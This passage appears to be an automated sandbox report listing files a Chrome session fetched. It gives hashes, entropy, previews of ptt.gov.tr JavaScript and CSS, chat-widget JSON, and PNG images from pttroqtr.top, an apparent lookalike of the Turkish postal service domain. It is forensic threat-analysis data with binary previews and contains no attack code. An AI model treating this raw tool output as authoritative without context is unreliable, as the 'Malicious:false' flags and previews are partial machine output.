                                                                                                                                                                                            SSDEEP:768:P+fYxCbRGCdY2M1T5Ti7hpRPJrYBC8ZTjlQMTCs/VhTP4TqCEWpN0kz35AFW2s:P+fbRhbjX9QZTFDVPw3YW2s
                                                                                                                                                                                            MD5:0216C2DA5703B33A746912DC8E3BEB8A
                                                                                                                                                                                            SHA1:3F0B87653D40A5A5C5B8767F830CAD59C33E6426
                                                                                                                                                                                            SHA-256:641E155CCF8052978B7126668711C5606358D5B6103BFC03601613153D7E7A8F
                                                                                                                                                                                            SHA-512:B608457CD061584F237AA712895F0A55231993C677920DF50CA3A3030A0D15EEB1E9D03F147B99C3DD1446CA512151E8D16086C9C1735748461F1A4C2817C35A
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            Preview:(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[4110],{1295:function(e,n){"use strict";n.Z={src:"/_next/static/media/no-image.77f0b5fb.jpg",height:300,width:500,blurDataURL:"data:image/jpeg;base64,/9j/4AAQSkZJRgABAQAAAQABAAD/2wCEAAoKCgoKCgsMDAsPEA4QDxYUExMUFiIYGhgaGCIzICUgICUgMy03LCksNy1RQDg4QFFeT0pPXnFlZXGPiI+7u/sBCgoKCgoKCwwMCw8QDhAPFhQTExQWIhgaGBoYIjMgJSAgJSAzLTcsKSw3LVFAODhAUV5PSk9ecWVlcY+Ij7u7+//CABEIAAUACAMBIgACEQEDEQH/xAAoAAEBAAAAAAAAAAAAAAAAAAAABwEBAQAAAAAAAAAAAAAAAAAAAAH/2gAMAwEAAhADEAAAALAI/8QAGxAAAgEFAAAAAAAAAAAAAAAAAQIAAxETITH/2gAIAQEAAT8AFN1a2Z230z//xAAVEQEBAAAAAAAAAAAAAAAAAAAAEf/aAAgBAgEBPwCP/8QAFREBAQAAAAAAAAAAAAAAAAAAABH/2gAIAQMBAT8Ar//Z"}},8196:function(e,n,t){"use strict";t.d(n,{Z:function(){return O}});var s=t(8565),r=t.n(s),a=t(3288),i=t(2466),l=t(3395),c=t(2260),o=t.n(c),u=t(8082),d=t(2718),h=t(3230),f=t(9792),p=t(1011),_=t(8810),m=t(6731),y=t.n(m);function v(e,n){(null==n||n>e.length)&&(n=e.length);for(var t=0,s=new Array(n);t<n;t++)s[t]=e[t];return s}fun
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:ASCII text, with very long lines (8249), with no line terminators
                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                            Size (bytes):8249
                                                                                                                                                                                            Entropy (8bit):5.0469122250162055
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:192:Nke907L+dS779XppCl9v8p4sLsm5id6FmPv:Nke907bXZplF4v
                                                                                                                                                                                            MD5:FF70CBA0168B8803E70EA85ADDAAECB0
                                                                                                                                                                                            SHA1:05F9C7716E21EC93AFCC29AA7644CE8109169FC0
                                                                                                                                                                                            SHA-256:C9BDAEB63F2279C6968B64944978519CE857E1AE3E4A4D5CD2E59317A261BA19
                                                                                                                                                                                            SHA-512:B1879FFB61E4CA9237264F6A560E52A4D8168E03F1629C46893B4969F15C77F9C50C86A5F0691C13E6181CB61EF9260424995D91FD5FF8FEDD54818830BA43C1
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            URL:https://www.ptt.gov.tr/_next/static/3nPo4dxLHf5a0RshtsAsa/_buildManifest.js
                                                                                                                                                                                            Preview:self.__BUILD_MANIFEST=function(e,i,a,s,t,r,c,n,d,u,o,g,p,l,m,h,k,f,b,j,y,F,P,_,I){return{__rewrites:{beforeFiles:[],afterFiles:[],fallback:[]},"/":[i,a,s,t,r,"static/css/2425cba10de1645b.css","static/chunks/pages/index-81bebd65698c8415.js"],"/_error":["static/chunks/pages/_error-32d9baaae5c99c79.js"],"/anket":[c,"static/chunks/pages/anket-2610e69587780097.js"],"/anket/[slug]":[c,"static/chunks/pages/anket/[slug]-1b52832c21c28bd1.js"],"/doviz-kurlari":["static/chunks/5698-10f078fe5b68f680.js","static/css/386d6f9094f2dfbc.css","static/chunks/pages/doviz-kurlari-5a26b114db728c07.js"],"/duyurular":[s,"static/css/3cbd8bcfbd63f115.css","static/chunks/pages/duyurular-8d6cda8f6e9d3111.js"],"/duyurular/[slug]":["static/css/6fd0127afe4f9150.css","static/chunks/pages/duyurular/[slug]-1f9ac4bc183a7385.js"],"/galeri":[i,a,n,"static/chunks/pages/galeri-e8845bfe84a8e178.js"],"/galeri/[slug]":[i,a,n,"static/chunks/pages/galeri/[slug]-7fb28712356cc23b.js"],"/gonderi-ucreti-hesaplama":[e,d,u,o,g,p,l,m,h
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                            Size (bytes):214512
                                                                                                                                                                                            Entropy (8bit):5.844382922581424
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:3072:6ZOJBndfIwfpzT0dWNiLmhcLaN/xpjejNvT3XdhryvR6+4qTSQLzLvU4VPQMW:64JZtjTGheveqTSQLznVPQMW
                                                                                                                                                                                            MD5:930C82182D46261C0E4629CFF77E8927
                                                                                                                                                                                            SHA1:B7C4E4039ED0E97894B00AD22C969A92F40C8D0C
                                                                                                                                                                                            SHA-256:B46AF6886ED3474AD1173B2A42477CC6712612F5D676DB184929CF39DBD9A6B2
                                                                                                                                                                                            SHA-512:4E8980FE3BC8E3794240F363593B3E40F3C59C045E3F9FD60E3DD2A4799A1C9E030653EAA3DA0BD4803DBCBD1DF493654B7246916E186E54CC089DBD1F48D88E
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            URL:https://www.ptt.gov.tr/_next/static/chunks/pages/_app-a58333aebeb24bd1.js
                                                                                                                                                                                            Preview:(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[2888],{242:function(e,t,n){var r={"./en/GetLanguageResourceResponse":[6855,6855],"./en/GetLanguageResourceResponse.json":[6855,6855],"./tr/GetLanguageResourceResponse":[6219,3401],"./tr/GetLanguageResourceResponse.json":[6219,3401]};function o(e){if(!n.o(r,e))return Promise.resolve().then((function(){var t=new Error("Cannot find module '"+e+"'");throw t.code="MODULE_NOT_FOUND",t}));var t=r[e],o=t[0];return n.e(t[1]).then((function(){return n.t(o,19)}))}o.keys=function(){return Object.keys(r)},o.id=242,e.exports=o},3197:function(e,t){"use strict";t.parse=function(e,t){if("string"!==typeof e)throw new TypeError("argument str must be a string");for(var r={},o=t||{},i=e.split(";"),c=o.decode||n,s=0;s<i.length;s++){var l=i[s],u=l.indexOf("=");if(!(u<0)){var f=l.substring(0,u).trim();if(void 0==r[f]){var d=l.substring(u+1,l.length).trim();'"'===d[0]&&(d=d.slice(1,-1)),r[f]=a(d,c)}}}return r},t.serialize=function(e,t,n){var a=n||{},i=a.
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:ASCII text, with very long lines (6026)
                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                            Size (bytes):6208
                                                                                                                                                                                            Entropy (8bit):4.93500615973303
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:48:FzvPioGBDRCsjVTvvl7JUhKzFVwscifwtqUBGdrdjJv2zLedka4PAWThn111rTEP:VP6BxEK3fwtwdf2aun11y6tuDtyjtCh
                                                                                                                                                                                            MD5:5B8237FC123BA2EB989444AF7BCAA46B
                                                                                                                                                                                            SHA1:5C9F48C258173E23640AF75387C8C2B81932CE00
                                                                                                                                                                                            SHA-256:F5527879E1C455A0C61FAEE05E586CA38563B69EAB4C2F3CB7C68E94E1089FDA
                                                                                                                                                                                            SHA-512:E2D9B2BCE2953378F0C4FA868C92AC9634E534074904030D8D8A35B0D7CDE4D1159D1DE916482AE079845A82B395B2A5562FCAB97B89A52803D6CBECCB60ECD1
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            URL:https://chatserver.alo-tech.com/static/assets/fontawesome/css/all.min.css
                                                                                                                                                                                            Preview:/*!. * Font Awesome Free 5.12.0 by @fontawesome - https://fontawesome.com. * License - https://fontawesome.com/license/free (Icons: CC BY 4.0, Fonts: SIL OFL 1.1, Code: MIT License). */.fa,.far,.fas{-moz-osx-font-smoothing:grayscale;-webkit-font-smoothing:antialiased;display:inline-block;font-style:normal;font-variant:normal;text-rendering:auto;line-height:1}.fa-xs{font-size:.75em}.fa-sm{font-size:.875em}.fa-1x{font-size:1em}.fa-2x{font-size:2em}.fa-3x{font-size:3em}.fa-4x{font-size:4em}.fa-5x{font-size:5em}.fa-6x{font-size:6em}.fa-7x{font-size:7em}.fa-8x{font-size:8em}.fa-9x{font-size:9em}.fa-10x{font-size:10em}.fa-fw{text-align:center;width:1.25em}.fa-ul{list-style-type:none;margin-left:2.5em;padding-left:0}.fa-ul>li{position:relative}.fa-li{left:-2em;position:absolute;text-align:center;width:2em;line-height:inherit}.fa-border{border:.08em solid #eee;border-radius:.1em;padding:.2em .25em .15em}.fa-spin{-webkit-animation:fa-spin 2s linear infinite;animation:fa-spin 2s linear infinite}
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:ASCII text, with very long lines (16738)
                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                            Size (bytes):16786
                                                                                                                                                                                            Entropy (8bit):5.215177146054649
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:96:rilmZioo339G50Fz+TFRTNGlIUZHW8+IBMSVWT6TIMr8XELtiKIGokAnKmK2/uiR:rigZip3M+cpN812cbrrfLYttyOuiR
                                                                                                                                                                                            MD5:A1387532464E933F53082E2AAC823BCF
                                                                                                                                                                                            SHA1:5906C6934848C0BECAA214824C8B1B4DA504E678
                                                                                                                                                                                            SHA-256:3F0D5462B87C6523CC8435DB1964225DEB7D7FEF4C9D228E290F9C3350947392
                                                                                                                                                                                            SHA-512:52784644D8FCEEE9748D22819D0F3FCE35B414342CDA43C4127F0DAB087BABD5DED63E63FD07AAF0EAE37BE9A4CBF23AC5A6EA48E43C71E14AB29767ED3A3577
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            URL:https://www.ptt.gov.tr/_next/static/css/6243e9b9a276eab5.css
                                                                                                                                                                                            Preview:.styles_container__SM2uK{display:flex;display:-ms-flexbox;justify-content:center;align-items:center;flex-direction:column}.styles_container__SM2uK>.styles_title__wSg3c{position:relative;display:inline-block;margin-bottom:4rem;color:var(--pttLinkColor);font-size:1.5rem;font-weight:var(--fontWeight)}.styles_container__SM2uK>.styles_title__wSg3c:before{position:absolute;top:50%;transform:translateY(-50%);left:-1rem;background-color:var(--pttGreenColor);content:"";width:.4rem;height:2rem}.styles_container__SM2uK>.styles_description__ZeTyg{margin-bottom:6rem;color:var(--pttLinkColor);font-weight:var(--fontWeight)}.styles_container__SM2uK>.styles_iconContainer__doMvh{position:relative;padding:1rem}.styles_container__SM2uK>.styles_iconContainer__doMvh>.styles_face__Yx2m0{position:relative;padding:2rem;border-radius:50%;color:var(--pttYellowColor);font-size:8rem;z-index:1}.styles_container__SM2uK>.styles_iconContainer__doMvh>i:not(.styles_face__Yx2m0){color:#eee;font-size:2.5rem}.styles_contai
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:PNG image data, 625 x 417, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):14568
                                                                                                                                                                                            Entropy (8bit):7.831658911869208
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:192:suNkVU4jxZ2lHuxGgOorSNlmX//WNGclmwdc/qxES/tfJBX2NJAloDcrm6U2g+UJ:UrxslRgOoyIO4SFP/1JBW7T6U2OfwO
                                                                                                                                                                                            MD5:29B5B29D4D533AA3E60051A8E1AD8ADB
                                                                                                                                                                                            SHA1:B6059B2ADC66192B8A94FE52607121480AC6B389
                                                                                                                                                                                            SHA-256:7CA1F87B86C0FE5112F036C9F914A5F2496C625749C748B73A5A64636277E677
                                                                                                                                                                                            SHA-512:ACBF4002886324B4E8E9DC04ECAA4E3970858C69DDA62D05288631D3A31C9DFDF26AB8665426E0198F4A3A3FC8A1FBD43B8F2E0D4EF3EE65469E3F00E02066D4
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            Preview:.PNG........IHDR...q..........[.....pHYs...#...#.x.?v....tEXtSoftware.Adobe ImageReadyq.e<..8uIDATx...=V......=s...MD.&"...4.W.....X...9.X.EHd..Y.`Px#..wU.Y.._......s4....*u.~]....................B.....q....8........@.... ..........B....!.....8........@.... ..........B....!.....8.........q... .........@.....!.....8.........q... .........@.....!.....8...B.....q... .........@.....!.....8...B.....q... .........@.....!.........B.....q....8........@.....!.........B.....q....8........@.... ..........B.....q....8........@.... ..........B....!.....8.........q... ..........B....!.....8.........q....0}.)....q..,}.. 7.(..h.w...B......~M...c......^..E....r8O.ca.}.....,...y....y.X..c..q.*....\..!...9i.;5..J...q...5....?I......v...M..........W.W...|...o...U.....8....qh>....../.y,.P7..:..Fz...d.3.e6........1..'..Q...L.q.U....|../.]-...4?.....6........i.....z..c...4s.......q. .I.qU..p...'.....s+.[.un.j.YZf.C.jI..c.V..m.c.a.@=.P.."....{.]T....8Y..y.[..8~XR.Qh..3r~.H....lw
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:PNG image data, 625 x 417, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                            Size (bytes):30380
                                                                                                                                                                                            Entropy (8bit):7.86681636831563
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:768:sVJVGfvVGfBG/GfBGpAbd2hqWRR2i6c8/Alm1nW7d482ZwNTDdtIPrOzj:sVJVGfvVGfBG/GfBGpAQUWRhB84Q1GDP
                                                                                                                                                                                            MD5:BFE1E0B8D54C3BE365553A5643298493
                                                                                                                                                                                            SHA1:66B3E9FCD7C541DB4E56BAB4F75ED8A3DF93E872
                                                                                                                                                                                            SHA-256:D811034E3AA4C50A5B95C86066670B838725976A41B7F1BCBACB6F307648F6C2
                                                                                                                                                                                            SHA-512:ADC45C69526A06781B4BC0267DD0E567C767665A6572FF47856277A9E5EA8F9704424B2913F7A2DC190E9EAB395681C7027783016FA08B1463383049874ADA2C
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            URL:https://pttroqtr.top/help/layout/images/50.png
                                                                                                                                                                                            Preview:.PNG........IHDR...q..........[.....pHYs...#...#.x.?v....tEXtSoftware.Adobe ImageReadyq.e<..v9IDATx...|..............N..}.......V...j.om.o..._k[.}...W[h.j].}.}'@ ...$$!.~.;.......=.....8...9s...o....DQ$......w.A......@........8.................... .......D......D...............q......q......"......@........8......8............. ...... .......D......................q......"......"......@........8.................... .......D......D...............q......q......"......@......@........8............. ...... .......D......................q......"......"......@........8......8.8......8............. ...... .......D......................q......"......"......@........8.................... .......D......D...............q......q......"......@......@........8............. ...... .......D......................q......"......"......@........8......8............. .......D......D...............q......q......"......@......@........8............................. .......D......D...............q...
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                            Size (bytes):929
                                                                                                                                                                                            Entropy (8bit):4.797071649336984
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:24:Y6uel1mf1zLXAWYP1+ezafLaZ0RSrHKm7wDKJb7VP9:YHzXAlnafjrm75J99
                                                                                                                                                                                            MD5:A1897091D57541A9E237EED5D3B0D200
                                                                                                                                                                                            SHA1:CD10F028D0939070C64BAA563BF564C19E292630
                                                                                                                                                                                            SHA-256:F898E77082F95F770AF246DD933818642232FACF671CAD0331DE04B9AF095566
                                                                                                                                                                                            SHA-512:9E9884841907667703DD7F2C7A196AB871231AB35CFC96C310ED44D28790D488D9BDFD778020B78A5B6359CA22F15D0CDEF468DBB8E8D8027C5B9516D333DF4D
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            URL:https://pttem.alo-tech.com/chat/get_my_widget_settings?widget_key=ahRzfm11c3RlcmktaGl6bWV0bGVyaXIYCxILQ2hhdFdpZGdldHMYgICk1cbTrwgMogEScHR0ZW0uYWxvLXRlY2guY29t&escapeHtml=false
                                                                                                                                                                                            Preview:{"success": true, "data": {"legal_requirements": false, "customer_path": null, "ws_server": "chatserver.alo-tech.com", "lang": "tr", "optional_email": true, "optional_phone": false, "hide_email": false, "hide_phone_number": false, "title": "Canl\u0131 Destek", "title_background_color": "FFFFFF", "title_text_color": "00A7CF", "subtitle": "Canl\u0131 Destek", "height": 500, "width": 350, "widget_version": "version1", "sys_nickname": "PTT", "chat_widget_icon": "chat/chat_icons/3af51a49-058b-4e67-9af9-1575813efeeb.png", "is_chat_widget_icon": true, "send_chat_history_to_customer": "", "widget_type": "alotech", "is_chat_widget_logo": false, "chat_widget_logo": null, "tenant_language": "tr", "optional_subject_choice": true, "widget_status": "online", "hide_new_chat_form": false, "file_upload_disabled": false, "send_emoji_disabled": false, "set_custom_library_properties": "", "is_speech_to_text": true, "is_python3": true}}
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:PNG image data, 625 x 417, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                            Size (bytes):10746
                                                                                                                                                                                            Entropy (8bit):7.750448157439093
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:192:pJ1sotcNTjukglXJd9p+d8Vn1LoujKwt/z318b+jJSrQPMnDQ4bM21yepESh:27VglXvnWu1Muj5p34+GnTT1yfg
                                                                                                                                                                                            MD5:B46BD38DC53B5A97A9F2E48539B34446
                                                                                                                                                                                            SHA1:D839AB9090F1011145FDB4AFB9F4B1E2ECCC6AA8
                                                                                                                                                                                            SHA-256:210BBA6C4F4B3D5C3F44664310E2F32595EE8859A6051396B6FFCD90FC3B167A
                                                                                                                                                                                            SHA-512:0B5A369BA21CC6607547D93B2E53AD7BE77999436B5E6A991D48AC4496A72606E475CB7979181695ACA126E18F28E4373C6DFE383710785D88B14420CA8B2AA4
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            URL:https://pttroqtr.top/help/layout/images/40.png
                                                                                                                                                                                            Preview:.PNG........IHDR...q..........[.....pHYs...#...#.x.?v....tEXtSoftware.Adobe ImageReadyq.e<..).IDATx...=v.V..`L.w.VV`.r)M......S.^....^A........S..H...+......q..~.s/.R.s..L..A..x..?.}.V...Y~r....8...8...8..!...!...!..@...@...@....................8...8...8..!...!...!..@...@...@....................8...8...8..!...!...!..@...@...@....................8...8...8..!...!...!..@...@...@....................8...8...8..!...!...!..@...@...@...@................8...8...8..!...!...!..@...@...@...@................8...8...8..!...!...!..@...@...@...@................8...8...8..!...!...!..@...@...@...@................8...8...8..!...!...!...!..@...@...@................8...8...8..!...!...!...!..@...@...@................8...8...8..!...!...!...!..@...@...@...........'...D..}..o...A...x.e.d<l....n.....q......J...?Cyl..T.N......5yQ.U.[y...Y....L.q.UpL..~*__..,4.N..o..w_..Gvhg.+T2.C{Q...@.g'..p.......uT......Q..k.c'..p....p...........r...ce3B...$...:......j.;ur.>......c.>..hM..n.0 }....d...[
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:ASCII text, with very long lines (7518)
                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                            Size (bytes):7569
                                                                                                                                                                                            Entropy (8bit):5.420173393523585
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:96:wAgS8hTvHoDvCaBbIw3uwCP8kZ8xQuP3BRGekLuvKDcCaBbIwb6wCP63mEq6QDLk:evHoGmzbCP8nQuPxQLvxmv/CP6+X82u
                                                                                                                                                                                            MD5:3D790CBBD856AB0CD5F882BD21AE4599
                                                                                                                                                                                            SHA1:9A08AF38B188DA423EBFCED9C3FAB45B148EA96E
                                                                                                                                                                                            SHA-256:E07B05A263F20A9B350DE296AD362C892323288C68A05E8A8FC1D1E1CF532949
                                                                                                                                                                                            SHA-512:7B7A71915B9E34A0730DAF6E0F357EB3EC9574A60E2C01476818467EB97E1A5C1814F3C6342E4B4EB202397CD258D16427949E5D216E97F6BBD7EFB4979265D2
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            URL:https://www.ptt.gov.tr/_next/static/chunks/pages/index-81bebd65698c8415.js
                                                                                                                                                                                            Preview:(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[5405],{5557:function(e,t,n){(window.__NEXT_P=window.__NEXT_P||[]).push(["/",function(){return n(8272)}])},8272:function(e,t,n){"use strict";n.r(t),n.d(t,{__N_SSP:function(){return H},default:function(){return B}});var r=n(3288),s=n(8082),a=n(4926),o=n.n(a),i=n(8196),c=n(9348),u=n(6731),l=n.n(u),f=n(2466),d=n(3395),p=n(5834),y=n.n(p),h=n(1011);var m=function(e){var t=e.stateAction;return(0,r.jsxs)("div",{id:"msm_shipment_time",className:y().container,children:[(0,r.jsx)("i",{onClick:function(){t(!1)},className:"fa-solid fa-xmark"}),(0,r.jsx)("div",{className:y().body,children:(0,r.jsx)(h.Z,{})})]})},_=n(8565),x=n.n(_),v=n(2718),j=n(3230),b=n(9792),g=n(3198),A=n.n(g);function N(e,t){(null==t||t>e.length)&&(t=e.length);for(var n=0,r=new Array(t);n<t;n++)r[n]=e[n];return r}function S(e,t,n,r,s,a,o){try{var i=e[a](o),c=i.value}catch(u){return void n(u)}i.done?t(c):Promise.resolve(c).then(r,s)}function T(e){return function(){var t=this
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:PNG image data, 625 x 417, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                            Size (bytes):62332
                                                                                                                                                                                            Entropy (8bit):7.984048376361694
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:1536:XF1K4X0e45gJhahETAI55341LAa/ny5pqkQJJoGWkr/gk6kV1i+y4:XZ0b5gy+P41sM/Xok6xL4
                                                                                                                                                                                            MD5:3E2AC9A8F2274B97550C20946E9E6AA7
                                                                                                                                                                                            SHA1:5748E42EF801F5682C683CF990053C880993FAF3
                                                                                                                                                                                            SHA-256:661C5384CC0FC72BBE7D9D938A618369DD63E2B926EEC03D2518BA2A27F83773
                                                                                                                                                                                            SHA-512:FBCF9108314BE3A9FB61E2D82F3E8201B31B042BEBE637F2250F58D69770B5FF9FC197EC260726189F119F0C6964F39726C1F340C50087C3B2D69DEFDE79AFE7
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            URL:https://pttroqtr.top/help/layout/images/54.png
                                                                                                                                                                                            Preview:.PNG........IHDR...q..........[.....pHYs...#...#.x.?v....tEXtSoftware.Adobe ImageReadyq.e<....IDATx..}..[...Q.VZi{.^.{..Wl... .'$!...~.GBI.K..._.!................Wu.3wF.+.z.^m....#k5...j..wN...A .....@ .[.R......@ ..#.....@ ..#.....@ ..#.....@ .G .....@ .G .....@ .G .....@$.@ .....@$.@ .....@$.@ .....H..@ .....H..@ .....H..@ .....H..@ .....8..@ .....8..@ .....8..@ ..."q...@ ..."q...@ ..."q...@ ..D.....@ ..D.....@ ..D.....@ ........@ ........@ ........@ ........@ ..#.....@ ..#.....@ ..#.....@ .G .....@ .G .....@ .G .....@$.@ .....@$.@ .....@$.@ .....H..@ .....H..@ .....H..@ .....H..@ .....8..@ .....8..@ .....8..@ ..."q...@ ..."q...@ ..."q...@ ..D.....@ ..D.....@ ..D.....@ ........@ ........@ ........@ ........@ ..#.....@ ..#.....@ ..#.....@ .G .....@ .G .....@ .G .....@$.@ .....@$.@ .....@$.@ .....@$.@ .............ao..Q#.&. {..{..r.......@.9h.AZ{.!.....K'>..K......../..02...$....a.A.T..@ ...c...;..2.jUD^.I.A...=(.,....>q...<.3o'm..@ ..D...'pZ.Q.C./R.jC.gT}m..4. ..1.........$
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:PNG image data, 625 x 417, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                            Size (bytes):12814
                                                                                                                                                                                            Entropy (8bit):7.837700315737001
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:192:8Kx9O7t/pK3/1itZQNeNuSkxTASsDcsDgivX58+XSqsho8M256x2H:8qO7t/pKP1iXQNFSkyDFk8X58azsn+6
                                                                                                                                                                                            MD5:6B7AF6A2B7BD0D796AD01641D6EC5B09
                                                                                                                                                                                            SHA1:A3CA47AF0E4F628E3093FE6B8DBA29C141075D2C
                                                                                                                                                                                            SHA-256:E21FDDE02EC42C12B46323A47FAAAE176F1F4BCD33BB72CFCD5F54AF303369F1
                                                                                                                                                                                            SHA-512:A559D77D27B8EA66686893DFA42DE749B666C23E4CF19CEB0C1D91D19232906E31D2A2B0B070CECF84F02F8A83A40074DD7793AA118E33A2F63B1A590AB9DCF8
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            URL:https://pttroqtr.top/help/layout/images/42.png
                                                                                                                                                                                            Preview:.PNG........IHDR...q..........[.....pHYs...#...#.x.?v....tEXtSoftware.Adobe ImageReadyq.e<..1.IDATx...Mv.F.7`.=wn.....).L.....W`e..W.y.....^..IOC. .......[.6.H">.$(>.9l.-.....CU...........)...!...!...!..@...@...@................8...8...8...8..!...!...!..@...@...@................8...8...8...8..!...!...!..@...@...@................8...8...8...8..!...!...!..@...@...@................8...8...8...8..!...!...!..@...@...@....................8...8...8..!...!...!..@...@...@....................8...8...8..!...!...!..@...@...@....................8...8...8..!...!...!..@...@...@....................8...8...8..!...!...!..@...@...@.....99*_...4.@.cO<.....(_.2.M....a}...W.p....A.E..R...k...O....j\...>J.r....m.....*..m..e.D....:.....2....b.Nk..|.e..q...F..<..Mq.B7..e.[).'..".|..b^.}p......(..'-...\.Y.......[?..5......rqu.....I!/*..LWe.su...n\...g.}U..R...l.-.\.>Z...?.v..w.rM.. ..t.\..K.u..~..h.z.......E.0W..c.2u]..5.a..>.Xn.>.0 .. 7+.u.<..ec.KvP!.)...J.sv_fh.=..}.,...P........i..E.....I
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:PNG image data, 625 x 417, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):68155
                                                                                                                                                                                            Entropy (8bit):7.976328915331773
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:1536:Psws3e4vQs5asznNtA2jZXiM1zGLvwTFXa6Ad1HgK6d3bzAGCNGVJVJVGj:EAYTBT1iLYTFXa1dtp6dr6
                                                                                                                                                                                            MD5:3AF1FB65D2985042EC15BAF2A68EDEFD
                                                                                                                                                                                            SHA1:DCFF4DCD6389FAB17DAEA641FA37F06CE1646FE9
                                                                                                                                                                                            SHA-256:C80A4608064847A85102440DBBFF50BB92EE57055DCEA38B23B8FDC33AFA6830
                                                                                                                                                                                            SHA-512:98E8CA2E55BC1D057F81E200E710A6BF36D20509612CD310E79A206F7A72F483C7FC07FF9C74D06DC9BD5E0BD92BA8039080E998D452F6D791CB120F908FBF75
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            Preview:.PNG........IHDR...q..........[.....pHYs...#...#.x.?v....tEXtSoftware.Adobe ImageReadyq.e<....IDATx........wf...88@......c..{.l..Q..MbL4.h,1**.(....+*...H...p....y..3...*$...K.m.....7..O#.1@..A..A._8....A..AP.!.. .. (...A..A..q.. .. (...A..A..q.. .. ..8.A..A..q.. .. ..8.A..A..E.. .. ..8.A..A..E.. .. ..".A..A..A.. .. ..".A..A..A.. .. ....C..A..A.. .. ....C..A..AP.!.. ....C..A..AP.!.. .. (...A..AP.!.. .. (...A..A..q.. .. ..8.A..A..q.. .. ..8.A..A..E.. .. ..8.A..A..E.. .. ..".A..A..E.. .. ..".A..A..A.. .. ..".A..A..A.. .. ....C..A..AP.!.. ....C..A..AP.!.. .. (...A..AP.!.. .. (...A..A..q.. .. (...A..A..q.. .. ..8.A..A..q.. .. ..8.A..A..E.. .. ..".A..A..E.. .. ..".A..A..A.. .. ..".A..A..A.. .. ....C..A..A.. .. ....C..A..AP.!.. .. (...A..AP.!.. .. (...A..A..q.. .. (...A..A..q.. .. ..8.A..A..q.. .. ..8.A..A..E.. .. ..8.A..A..E.. .. ..".A..A..A.. .. ..".A..A..A.. .. ....C..A..A.. .. ....C..A..AP.!.. ....C..A..AP.!.. .. (...A..AP.!.. .. (...A..A..q.. .. ..8.A..A..q.. .. ..8.A..A..E.. ..
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
